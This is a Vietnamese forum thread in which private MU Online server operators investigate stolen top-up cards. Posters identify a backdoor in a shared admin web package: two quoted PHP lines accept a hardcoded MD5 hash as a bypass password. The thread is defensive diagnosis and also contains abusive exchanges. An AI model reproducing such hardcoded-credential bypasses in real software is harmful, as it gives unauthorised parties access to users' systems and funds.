PDA

View Full Version : Báo Đọộng Mất Thẻ Khi Xài Web Thiếu Vân 1.85 Do Mr.Cuong Share

wan0124
22-06-11, 07:48 PM
Báo Đọộng Mất Thẻ Khi Xài Web Thiếu Vân 1.85 Do Mr.Cuong Share hôm nay mình chuyển sang xài web của mrcuong share mới open nên có tặng 100% thẻ nạp 1 số mem phàn nàn là nạp thẻ sao ko x2 thẻ mình vào kiểm tra log thì log xoá sạch banh nhìn doanh thu thấy tăng thêm 200k mà ko biết có anh chàng tốt bụng nào đã nẫng mất của mình vào listip.txt thì thấy 1 dãy dằng dặc ip mình xài ip động nên cũng chả biết ip nào ra ip nào nhưng mình nghĩ có người đã ghé thăm server mình đặt tại server riêng có AVG nên ko sợ dính em bé mình nghĩ code này có vấn đề mong pro nào đó check hộ mình code có bị gì ko :-s mình cũng ko dám trách ai vì xài hàng share thì chấp nhận thôi hic ức chế vô cùng

Hào Hoa Công Tử
22-06-11, 07:54 PM
ui gay nhỉ
pro nào ra tay check giùm cái :)
cũng đang dùng web này mà mu chưa open
có khi cho nap qua yahoo là an toàn nhất ;)

wan0124
22-06-11, 07:57 PM
nói thêm là pass md5 tất cả đều là pass riêng của mình đặt ký tự rất lắt léo 100% là có shell

whylove
22-06-11, 07:58 PM
bạn kiểm tra file cardphone.php và checkip.php trong Server/admin sẽ rõ

file checkip.php

if ($code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['code'] = $passcode;

file cardphone.php

if ($pass == $passcard || $pass == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['codecard'] = $passcard;

người chủ cái pass đó có thể tự add ip của mình vào Server các bạn và sau đó là có thể view dc file check card :D

Mr.Noob
22-06-11, 08:00 PM
dùng hàng share thì chấp nhận shell.

Bạn kiểm tra lại xem.Ra 1 cửa hàng net rồi vào trang admin xem nó có bắt cập nhật ip ko.Có thể chức năng đó bị lỗi.

Hào Hoa Công Tử
22-06-11, 08:01 PM
bây giờ đổi 2 cái pass đó đi là đc à :)

wan0124
22-06-11, 08:05 PM
bạn kiểm tra file cardphone.php và checkip.php trong Server/admin sẽ rõ

file checkip.php

file cardphone.php
người chủ cái pass đó có thể tự add ip của mình vào Server các bạn và sau đó là có thể view dc file check card :D

ax khôốn nạn thâật search md5 ko thâấy maã md5 này => 90% chủ thớt share làm vụ này rồi

whylove
22-06-11, 08:06 PM
bây giờ đổi 2 cái pass đó đi là đc à :)
mình chưa biết có đc 100% ko nhưng mình đổi lại cả link Server và pass đó.
VD link server của mình là: mu.com/kocoserver/

Hào Hoa Công Tử
22-06-11, 08:09 PM
:) thanks bạn nhé
30 charrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr

thecong
22-06-11, 08:12 PM
he he, các bản web của mình mình đều scan rất kỹ, và khi cài cho khách mình thường chỉ để cho 127.0.0.1 được phép kết nối vào trang admin và server, còn các ip không cần đến mình delete hết :))

whylove
22-06-11, 08:16 PM
khi bạn đăng nhập đc file checkip.php thì nó sẽ tự add ip của bạn vào :D

wan0124
22-06-11, 08:17 PM
hic thế là mình là con gà vàng đầu tiên lên thớt sao :-s

ngocanh87
22-06-11, 08:31 PM
Mà làm sao biết được địa chỉ wweb của mình mà check nhỉ

Mr.Hau
22-06-11, 08:32 PM
Khổ thân ông Cường,ngày trước quen ông thì thấy ông rất tốt.Nhưng bây giờ thì không biết thế nào,vì gần 1 năm rùi ko gặp.Ông xem giải thích giùm đi không thì mất tiếng chết :D

Cứ như tui ,làm ngon cái nào share cái đấy,full mà không kiểm tra kỹ cũng nguy đấy8->

Edward_Newgate
22-06-11, 08:47 PM
Cẩn thận chẳng lại bị đứa nào xơi mất
Rùi đổi cho bác Cường
Bác ý đã nói 1 câu ngay ở đầu topic thế này chắc hok lấy đâu

Bản này Hoàn Toàn Sạch 100% nhé ko như ai kia trên CLB share còn ém hàng vào

sieuga
22-06-11, 08:58 PM
mình chưa thấy hiện tượng gì ngoài mấy lỗi rs mất master khi ko cộng điểm mà vào game. mà điểm thì mất lv master vẫn 200>> hết luyện lại master. cái nữa là tẩy point cũng mất và relife cũng mất master mà lv toàn max 200>> hết luyện lại master.

†ShiNiChi†
22-06-11, 08:58 PM
Đây ko phải là do MrCuong, bởi vì source khi TV send mình, cũng đã có cái đoạn check pass MD5 đó rồi :)
Nên phải để ý kĩ trước khi xài, mua web của ai cũng vậy cả.

whylove
22-06-11, 09:12 PM
khi share bác Cường đã bảo rồi :D

Bản này nguyên bản từ ThieuVan đưa chỉ xóa Code Check Lic chưa chỉnh sửa hay thêm gì ráo , anh em thích sửa sao thì đem về mà sửa :-&
nên ko thể trách bác ấy dc :)

lonmeclbg
22-06-11, 11:07 PM
bọn này nguy hiểm VL nhỉ................

mrrainnt
23-06-11, 12:52 AM
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Mr.Cuong
23-06-11, 01:50 AM
Khổ thân ông Cường,ngày trước quen ông thì thấy ông rất tốt.Nhưng bây giờ thì không biết thế nào,vì gần 1 năm rùi ko gặp.Ông xem giải thích giùm đi không thì mất tiếng chết :D

Cứ như tui ,làm ngon cái nào share cái đấy,full mà không kiểm tra kỹ cũng nguy đấy8->

Vấn đề này tui cũng ko bít . Bộ web này của 1 người mua của Thiếu Vân bữa ông Thiếu Vân có bảo ai xài bộ Web này mà ko đưa domain cho ổng cập nhật thì ổng sẽ phá . Vã lại tui cũng ko xài bộ này nên chả rành ;)) ko tin đi hỏi những ai mua bộ Web này của TV xem có cái đoạn Code đó ko nhé về phần tui thì chả làm nhưng việc như thế để làm gì ;))

lonmeclbg
23-06-11, 02:11 AM
thế hoá ra thằng súc vật TV nó còn Vãi Lồn hơn nữa nhỉ =)) =))

eva0001
23-06-11, 03:12 AM
cái loại này ra đường gặp tao ko ăn chém hơi lạ =)). súc vật. cứ bảo hàng share thì phải chịu, nhưng thử nghĩ xem. chúng mày bro cái nỗi gì, toàn đi ém hàng người ta, kiếm vài cái đồng lẻ bằng cách này =)). nếu ko muốn ai làm mu, ko muốn cạnh tranh nhiều mu thì đừng share nữa, thế thôi.

cho hỏi anh TV dân đâu mà bựa vậy =)), thấy đâu cũng thiếu vân web với chả mr.cuong, tưởng bro thế nào, hoá ra cũng chỉ thế này =)). thi nhau đi cắn trộm

uh thì chúng mày làm Mu sớm hơn tao, biết hơn tao. pro hơn tao cái khoản này. nhưng trừ mu ra thì loại chúng mày đú với tao cả đời cũng éo bằng nổi 1 cái gì đâu, từ ngày tập làm mu chơi bời tý lên clb mới biết nhiều anh khắm thế nào, ra ngoài ko biết mặt mũi các anh ấy hình hài nó thế nào mà bựa thế. tao thì ko dùng cái web này, chỉ cay cú hộ anh em nào bị mất thôi :)) =))

TRIEN
23-06-11, 07:26 AM
cái loại này ra đường gặp tao ko ăn chém hơi lạ =)). súc vật. cứ bảo hàng share thì phải chịu, nhưng thử nghĩ xem. chúng mày bro cái nỗi gì, toàn đi ém hàng người ta, kiếm vài cái đồng lẻ bằng cách này =)). nếu ko muốn ai làm mu, ko muốn cạnh tranh nhiều mu thì đừng share nữa, thế thôi.

cho hỏi anh TV dân đâu mà bựa vậy =)), thấy đâu cũng thiếu vân web với chả mr.cuong, tưởng bro thế nào, hoá ra cũng chỉ thế này =)). thi nhau đi cắn trộm

uh thì chúng mày làm Mu sớm hơn tao, biết hơn tao. pro hơn tao cái khoản này. nhưng trừ mu ra thì loại chúng mày đú với tao cả đời cũng éo bằng nổi 1 cái gì đâu, từ ngày tập làm mu chơi bời tý lên clb mới biết nhiều anh khắm thế nào, ra ngoài ko biết mặt mũi các anh ấy hình hài nó thế nào mà bựa thế. tao thì ko dùng cái web này, chỉ cay cú hộ anh em nào bị mất thôi :)) =))
Anh shinichi cũng đã nói rồi đó thôi code này là của TV đưa vào . các bạn dùng phải sửa đi

wan0124
23-06-11, 07:27 AM
Vấn đề này tui cũng ko bít . Bộ web này của 1 người mua của Thiếu Vân bữa ông Thiếu Vân có bảo ai xài bộ Web này mà ko đưa domain cho ổng cập nhật thì ổng sẽ phá .

hic bác nói thế này thì thôi vậy delete hết quay về xài bản 1.75 của bác apble vậy hic mình xài của bác í miết chả sao chuyển sang xài của bác có chuyện liền :-s

sunthah12
23-06-11, 08:06 AM
hic bác nói thế này thì thôi vậy delete hết quay về xài bản 1.75 của bác apble vậy hic mình xài của bác í miết chả sao chuyển sang xài của bác có chuyện liền :-s
bản tv 1. 75 thấy vân ngon chịu khó nghick up thêm chưc năng 1.85 la ok

Edward_Newgate
23-06-11, 08:27 AM
Tự nhiên có thằng ngu ngu ko biết xài web
Mất thẻ rùi kêu "Ém hàng"
Hỏi xem có ai bị thế nữa ngoài chủ topic ko
Ko biết đường đổi tên thư mục đi à

wan0124
23-06-11, 09:00 AM
server tui thêm mâấy con số ở sau thành server097xxxxx ông nói tôi ngu hơi quá lời đấy đến cái pass md5 cũng là pass riêng của tui tui tự đổi có ký tự tùm lum vào

†ShiNiChi†
23-06-11, 11:30 AM
Dùng soft scan Directory thư mục là ra ngay mà. Đổi tên đằng zời vẫn tìm được. Cách duy nhất là đổi pass md5 ở mấy file check passcode đi là xong :)

eva0001
23-06-11, 12:25 PM
Dùng soft scan Directory thư mục là ra ngay mà. Đổi tên đằng zời vẫn tìm được. Cách duy nhất là đổi pass md5 ở mấy file check passcode đi là xong :)

bác nỳ nói chuẩn, đổi pass md5 ở mấy file đó đi là ok. ko thì delete file checkip - activeip đi. e nghĩ chắc thế là ổn

mrrainnt
23-06-11, 03:12 PM
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
- Hoặc là đổi pass md5 đi
- Với lại hàng Share thì phải chịu thôi ^^!

Edward_Newgate
23-06-11, 04:19 PM
Bác cho em xin cái soft đó em về vọc xem thế nào :)

eva0001
23-06-11, 05:22 PM

=)) đi chửi ngta ngu mạnh mồm lắm mà. cái loại bị mất mà ko biết mới là ngu . nó vào nó xóa cả log, tăng cả thu nhập mà ko thấy thẻ mà lại tự mất dc à, giỏi quá =))

†ShiNiChi†
23-06-11, 07:00 PM
Thôi, share ra mấy bạn lại đi phá người khác thôi. Tốt nhất ém hàng :))

sunthah12
23-06-11, 07:18 PM
hoac dow tols havi hack sop loi cung ho tro cack MD5

CLB hong Vietkey rui

thax nao'

trinhdat
23-06-11, 07:32 PM
các bạn nên check kỹ code ! tốt nhất là mua

eva0001
23-06-11, 08:01 PM
hoac dow tols havi hack sop loi cung ho tro cack MD5

CLB hong Vietkey rui

thax nao'

nó xin là xin soft scan direct foder cơ mà, có phải liên quan gì MD5 đâu. mà MD5 crack bằng niềm tin bạn ạ, đó toàn là mấy trang nó so sánh mã md5 mình đưa với data của nó có thì nó show ra thôi.

mrrainnt
23-06-11, 09:52 PM
@-)! Chuyển sang xin tools rầu !
...........................
Mod close là vừa rầu ;))!

mrvu058
23-06-11, 11:35 PM
cho a e cm vài 3 bữa nữa rồi close đou có muộn ;))

apple
24-06-11, 07:45 AM
eo, may cua minh co 50k , vao kiem tra sach bach :-ss

Edward_Newgate
24-06-11, 08:41 AM
=)) đi chửi ngta ngu mạnh mồm lắm mà. cái loại bị mất mà ko biết mới là ngu . nó vào nó xóa cả log, tăng cả thu nhập mà ko thấy thẻ mà lại tự mất dc à, giỏi quá =))
Rất tiếc là tao đéo thể mất được cái thẻ nào :))
Mày cứ sủa bậy đi rùi sẽ đc đi nghỉ mát ở Hỏa lò :))

eva0001
24-06-11, 10:16 AM
=)) mày nghĩ mày là ai thế mà dọa tao, lậy chúa thằng ngu này, mày nghĩ tao sợ khóa tk diễn đàn sao =)), đúng là ngu từ trong trứng ra. mày ko mất thì thôi, nhưng ngta mất thật mày lại đi chửi ngta ngu là sao. chính mày đi cắn ngta trước đấy.

Mr.Noob
24-06-11, 10:44 AM
Stop ngay tại đây.Cảnh cáo 2 bạn trên không tranh luận cãi vã riêng trên diễn đàn.